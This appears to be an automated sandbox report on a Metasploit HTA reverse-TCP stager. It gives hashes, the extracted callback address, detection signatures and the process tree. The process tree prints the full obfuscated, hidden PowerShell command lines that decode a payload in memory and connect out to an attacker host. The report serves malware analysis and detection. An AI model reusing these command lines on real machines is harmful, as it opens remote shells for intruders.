Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 04:34
Static task
static1
Behavioral task
behavioral1
Sample
reverse_tcp_uuid.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
reverse_tcp_uuid.hta
Resource
win10v2004-20240426-en
General
-
Target
reverse_tcp_uuid.hta
-
Size
7KB
-
MD5
b177937631436154e4bbf6f577e127ed
-
SHA1
0cf3505cc7a317f6ede0f2174c4b3fa3f1198d64
-
SHA256
b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1
-
SHA512
f7a497976e8c4a37728495655b501223efb1e237ce794484fd56b7b95a69a54e1e2a3c16ec8523ddac93ce8c9fc08642588ee62e86fcb7a290d97b52efecadf5
-
SSDEEP
192:bn2jh1hqT24RKhkbiC5w1VyFUqzmIsMRwYXWlQ4RF6hd9d:bn2jh1hsRRROiSVyF5mH019rhd9d
Malware Config
Extracted
metasploit
windows/reverse_tcp
1.14.247.162:40001
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 13 380 powershell.exe 13 380 powershell.exe 13 380 powershell.exe 13 380 powershell.exe 13 380 powershell.exe 13 380 powershell.exe 13 380 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2240 powershell.exe 380 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2240 powershell.exe 2240 powershell.exe 380 powershell.exe 380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 380 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 4380 wrote to memory of 2240 4380 mshta.exe powershell.exe PID 4380 wrote to memory of 2240 4380 mshta.exe powershell.exe PID 4380 wrote to memory of 2240 4380 mshta.exe powershell.exe PID 2240 wrote to memory of 380 2240 powershell.exe powershell.exe PID 2240 wrote to memory of 380 2240 powershell.exe powershell.exe PID 2240 wrote to memory of 380 2240 powershell.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\reverse_tcp_uuid.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARQBnAEgANgAyAFUAQwBBADcAVgBXAGIAVwAvAGkATwBCAEQAKwB2AHQATAArAGgAMgBpAEYAUgBOAEIAUwBFAGwANgB1ADIAMQBaAGEANgBSAHoAUwBBAEcAMgBoAGcAUgBRAG8AWgBkAEgASgBUAFoAegBFAGkAeABQAFQAeABDAG0AbABlAC8AdgBmAGIAeAB4AEkAeQA5ACcAJwArACcAJwA2ADIAcQA5ADUASgBhADQAbgBXAHMAVwBmAEcANAAyAGUAZQBtAGIARwBmAHgAYQA2AGcAUABGAGIAaQBsAHYATAB0AC8AVAB0AGwATgAyAHkAYwA0AEUAaABSAFMAegB3ADEAeABsAFcAbABsAEQAVQByAHoAMwB1AGwATgBEAHMAJwAnACsAJwAnADgAVQBqADQAcgA2AGgAeQB0AFYAaQBhAFAATQBJADAAWABKAHkAZgB0AEwARQBsAEkATABMAGIAZgB0AFEANABSAEsARQAxAEoAZABNAHMAbwBTAGQAVwBLADgAcgBjAHkARABVAGwAQwBEAGkANQB2AHYAeABKAFgASwBOACsAVQAwAGwAKwAxAEQAdQBPADMAbQBPADMARQBOAG0AMwBzAGgAawBRADUAUQBMAEUAbgA5AHkANgA0AGkANgBWAGIATgBXAGYARgBxAEYARABMAFgANwA2AFUASwAvAE8ARAArAHEASgAyAGUAcABkAGgAbABxAHAAbABaADUATQBLAEUAdABVADgAeABzAG8AVgA1AFgAdABGAEgAbgBpADEAVwBSAEcAMQAzAEsAZAB1AHcAbABQAHUAaQA5AHEAVQB4AHMAMQBHAGIAUgB5AG4AMgBDAGMARABzAEgAWgBQACsAawBTAEUAMwBFAHYATABjAEoAbgBuADYAeQBSAEUAWgBFAG0AOAB2AFoAVQAwAHMAeABWAFMAeQB6AEMAMQBFACsANABpAHoAMAB0AEkAbQBwAGEAcgB5AGwAdwBlAE0ARgA4AHMALwBsAFQAbgB1ADkATgBIAFcAUwB4AG8AUgBHAHEAOQBXAEoAQwBFAHIAeAB5AFMAMwBGAE8AWABwAEwAVQB1AGoAagAxAEcAUgBzAFIAZgBnAEoAewAxAH0AagBFACcAJwArACcAJwBoAG8ASABpADAAbwBGAHgATwA3ADUAawBxAGkAbABPAEcATwBzAHEAdgB3AFgATQArAHEAQQByAEEAdgBzADMAcQBxAGsANwBpAHUAQgBsAEMAMgBTAFMAaABWAEMAKwBzAEkAOQArADkAegBMAEcATgBsAHEAbABsADkAdwBOAEsAZABCAEIAYwBhAFcAQwBnAEQAZgBkADQAbQBnAC8AOABTAGQAdwB4AGUANAA4ADcAeABRAGoASABtACsAUQA4AEIAZgAxAGUAewAxAH0AcAB6AFYAVQAnACcAKwAnACcALwBLADMAcABWADYAYwBQAEoAVwBQAEIAawBBADUAKwBsAHEAeQBRAGoAbABjAFUAVAAyAGsAcgBwADAAUgA0AGwAMQBiAGQAYQBxAHgAZQBxAG8ARQBnAG0ANgA4AHsAMQB9ADUAcgBNADAAbgBuAEgAcQBMAFoAdwBzAC8AaABMACsAMABuAFAAbQA5AHIAcABSADYAbgBjADAAbQA4AFcAbABNAHoARQAyAE0ASQArAG8AVwBoAEYAVgBmAEMAZwByAHgARwBjAGsAeABxAFIAVgBpACcAJwArACcAJwBBAC8AQgBSAEwAZQA4ADIAaQBHAGMAUwBSAGcASQBzAEoATQB5AFMARwB6ACsAcABuAFUAWgBVAFAATwBrAGEARwBXAFUAZQBTAFoAQQBMAGcAVQAzAEIASwA0AGgANQA1AFUAZABuAHQAcABGAFQAeQA3ADIANABUAHkASQBBAGMAUABzAE4AWgBDADMANQBrAEMAYQBrAGsATgA2AGwAeABxAHsAMQB9ADQAWABYADYARABVAEwAbgBOAGMASgBwAFcARgBUAHUARABQAEgAVwByACcAJwArACcAJwBpAGsATQAnACcAKwAnACcAdwBJADEANQBWAFEAWABGAEsAZAAxAHMAJwAnACsAJwAnAG8ARQB6AHkAZgBsAHAALwBkADcAVwBkAE0AVQBCAGUAbgBvAGoAQwAzAHEAUAB3AGIAegAnACcAKwAnACcAOQAyADUAYgBSADYAbgBJAHMAbABjACcAJwArACcAJwBpAEMAMQBnAGMATwBXAHMAaQBFAHMAeABrADUAQgBVAGwAUwA3ADEAaQBMAEYAeABhAEYAQwBjAFgAMwA0AFIAawBEAFoAbQBEAFAASQBIAEwATgAxAEQAUQBHAEIARgBBAHUARQBJAHkAWgBnAEUAWABNADMAWgBVAGEAawA1AFIAUABTAGkARgBTAE0AUgB5AE8AUwBGAHcAMgBJADQAZwBEAEsAeAB5ADUASwBjAHsAMQB9AGoAZwBnAFgAdgBrADEAVAA0AHQAcwAyAEYASgBmAHsAMQB9AGwATwBBAHMAdQBjAG4AQgBOAHgAaABYAEYAUwBWAEMAVQAwAEUAMQBDAEcASgBjADAANgB5AC8AKwBYAEgAegB5AFYAbwA2ADEAQQA3AEkAYgBzAFEAcQBVAFcAbQB6AHsAMQB9ADIATgBrAE0AbABRAGUAaAB5AFoAQQA4AG4AVgBIAFUANAA1AEsAbwBrAEEAUgBLAHkARQBSAHcAWgBPAHkAVwBGAHIAVwAyAC8AVQBEADkAbwBsAHQAUgBHAE0AVwBTADkAbQBmAGUAOQBzAFMAZQB1ADkATgBmAHoANgA4AEIAdgBUAFoAbwAvADMALwBTAE4AYgA2AEQAegBxAHUAKwAzAFUANwBsAGgASABpAEsANgBEAHQAWABzADAAUQBLADUAMwA1AHAARgBqAFoAOQBJAFMAegBtAGwAUAB0AEcAMwBVAEgAVgBMAGQAYQBJAFcAdQBvAFYAJwAnACsAJwAnAC8ASgBlAFQAMABJAGsASABkADUANABSAGoAaABNACcAJwArACcAJwBIAFMAWgBiAHAAdABkAHoAWgBtAGwATwBsADEAMwBwADkATABXADEAbwBiAGIAYQBuAFcAdgBkAGQAUgBzAHQAaQA2AGIAKwBoAEkAUQBuACcAJwArACcAJwBJAEgAZQBFAG4AbQBEAGkASwA0AGYATABtAEQAdQBTAGgAdABHAEwAegBYADAASABqAHMAOQAnACcAKwAnACcAYQA0ADkAdQBwAHcAMwByAFoAcwBxADYAVwBzAHMASwAvAFMAbABQAG4AYwBPAFoAcQBXAG4AYQBzAHsAMQB9AGYATgAvAGcAewAxAH0AaABnADMAdgBOAC8AdQBhADYAUAB1AEoAWABYAFQAYwB5AFcAagBIAFgAagAnACcAKwAnACcAdAB1AHQASgBUAHAARgBxAEIAMgBmAFQAaQB5AEQAbgA4ACsATQBCAE4AbgBhAEIAQQBjAHIAagBvAGEAZgBtAGoAdwBLADIAdQBqAHMAdwBhAEQAawBaAGoAaQAyAGoATwBIAFEATQB0AEMANAA4AC8AWABPAFAATgB7ADEAfQBDADcAWABoADYAagBVAE4AagBPAG0AbgBRAG0AOQBYADEASwBJAFIAdgBhADkAMABkAG4AbQB0ADYAcQArAGUAUgBSADAANABsAGMAQgAyAE8AYwBHAGoAeQBVAHoAbQAzAFAATQA5ADgANABKAFoANQBhADYANgBFAE4AYQAxAFAAQgBwADIAUAA2AGMAUABaACcAJwArACcAJwBOAGUANQBmAEoASgBlAFcAcAB0AFcAbgBJAEIAdQBNAHcARgA3AFEAYgByAGkAaABEAC8AYgBNAGoAOABqADQATwBPAEIAcABBAHkAOABOAGoAZwB4AHAANAArAHsAMQB9AE8AZABjAEwAWgB5AHIASQBaADcARgArAE4ARwB4AHgATgAyAE8AQQBhAG8ANAB1AGIAagBiAFEAeABzADEAdQBvAHEALwBOAHAASgAwAEIARAAnACcAKwAnACcARQBNAGUAQgBNAGMAUQBvAHYAVABjAGYAVABhADAAKwA4AGIAZwAzAC8AVwBNAHcAOAA3AFgASgBOAGYAdQBrAG0AZQAyAGgASAB7ADEAfQA0ADEATwBWAGIAawBIAHYANgB1AHUAKwBhADUAZQAxAE4AZgB1ADUAZQBmAGoAaQA2AG0AZABCAEoAeABCACcAJwArACcAJwBOAHUAVABEADAAQwBnACsAWgBqAEcAbwB0AGwAewAnACcAKwAnACcAMQB9AGwAQgA1ADgAVwBXADMAZgB2AHkAdAA1AGsAegAwAEsAdgBkAFoASAArAGoAaABKAFEAOAB5AEEAVwB0AEEAZwBpAGsAUwAzAGUARwBMAHQAaQByADcATgBxAGQAUgBRAFYAWABnADQATABFAGsAUwBFAHcAYgBOAEYAdABwAHgAawBSAHUASQBNAGUANwBLAGgAZwBQAE4AQQBWAHIAZAB0AGcASABKAGYAagBqAHUANQBlADYAOABOAEsAcwBvAFQAJwAnACsAJwAnADQASwBWADUAegBaAFUATABKADIAYwAzAEkAQwBIAE0AdABVAGcAQwBXAG8AWABKAEEANQBFAFcATgBVAGYAbQByAG8ATwBMAFUAUgAvADAARgB0ADUAVAByADMAOQBYAG0AMgArADIAcQBpADUAcwBhAHAAcwBRAGcAQgBMAHsAMQB9AFoAdgBsAHQAcwBFAGMAOQBSAFYAVgAvAGQAMQBJAHcAUwB0AEQAUQBMAEYANwBEAGEAdgBYAHsAMQB9AEkATgB6AGwAMQBDAHsAMQB9AG8ARgBSAHUAUwA0AFUARQB6ACsAQwBjADcAVQBPAFgAMwArAG0ASgBBAFAAdQA0AEEAVwBCADEAdQBQAFIAYwB2AGkANgBBAEcAYQBCADkAUQBPADYAVQBrAHAARABOAGQANwArAFoAbAAwAFQANABPADgAbQB5AHEAMwBVAGgALwBQAE4AKwBUAFoAYgBuAHQAVgAvAHMAdgBvAGwAQQBlAGwAWABDADgAdABQAGkAagB3AHQANwBmAGUASwAzAFgAWAA2AEsAcQBRAEEANQBCADgAbwAxAEkAOQB1AEgAeABFAHMAewAxAH0ANwBIAEoAagBMADYAbwA1ADcALwAzAGQAawBJAC8AcgB5ADAAdwBjAEQATwBDAHgAbAByAGUATABmAHcAQQBnADIANQBRADQAMAB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBZACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oEzyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:380
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD53c701cd9ee72ec208a2c0b87ca77b52f
SHA167822a4e63fdde7bf9414fa3d3471e63ddd1aec4
SHA256544eb5f18963ce22a90c1941b7e2909534c5cecf6729c4d6692d00dd6a7a6c9c
SHA5124db4720e643c8d7f1d550313b924dc141c30d3c6d7936c0315c12dcff68996e3bfdabe24b6dc4886766e911c1c816c6655c50a75e3b7768270d6978113f24427
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ct5fulis.3ob.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/380-37-0x0000000005E00000-0x0000000005E01000-memory.dmpFilesize
4KB
-
memory/380-35-0x00000000059E0000-0x0000000005D34000-memory.dmpFilesize
3.3MB
-
memory/2240-4-0x0000000074990000-0x0000000075140000-memory.dmpFilesize
7.7MB
-
memory/2240-21-0x00000000063B0000-0x00000000063CA000-memory.dmpFilesize
104KB
-
memory/2240-7-0x0000000005850000-0x00000000058B6000-memory.dmpFilesize
408KB
-
memory/2240-5-0x0000000005610000-0x0000000005632000-memory.dmpFilesize
136KB
-
memory/2240-17-0x0000000005AE0000-0x0000000005E34000-memory.dmpFilesize
3.3MB
-
memory/2240-18-0x0000000005E80000-0x0000000005E9E000-memory.dmpFilesize
120KB
-
memory/2240-19-0x0000000005EC0000-0x0000000005F0C000-memory.dmpFilesize
304KB
-
memory/2240-6-0x0000000005730000-0x0000000005796000-memory.dmpFilesize
408KB
-
memory/2240-20-0x00000000077D0000-0x0000000007E4A000-memory.dmpFilesize
6.5MB
-
memory/2240-0-0x000000007499E000-0x000000007499F000-memory.dmpFilesize
4KB
-
memory/2240-25-0x0000000074990000-0x0000000075140000-memory.dmpFilesize
7.7MB
-
memory/2240-2-0x0000000004FB0000-0x00000000055D8000-memory.dmpFilesize
6.2MB
-
memory/2240-3-0x0000000074990000-0x0000000075140000-memory.dmpFilesize
7.7MB
-
memory/2240-1-0x00000000048C0000-0x00000000048F6000-memory.dmpFilesize
216KB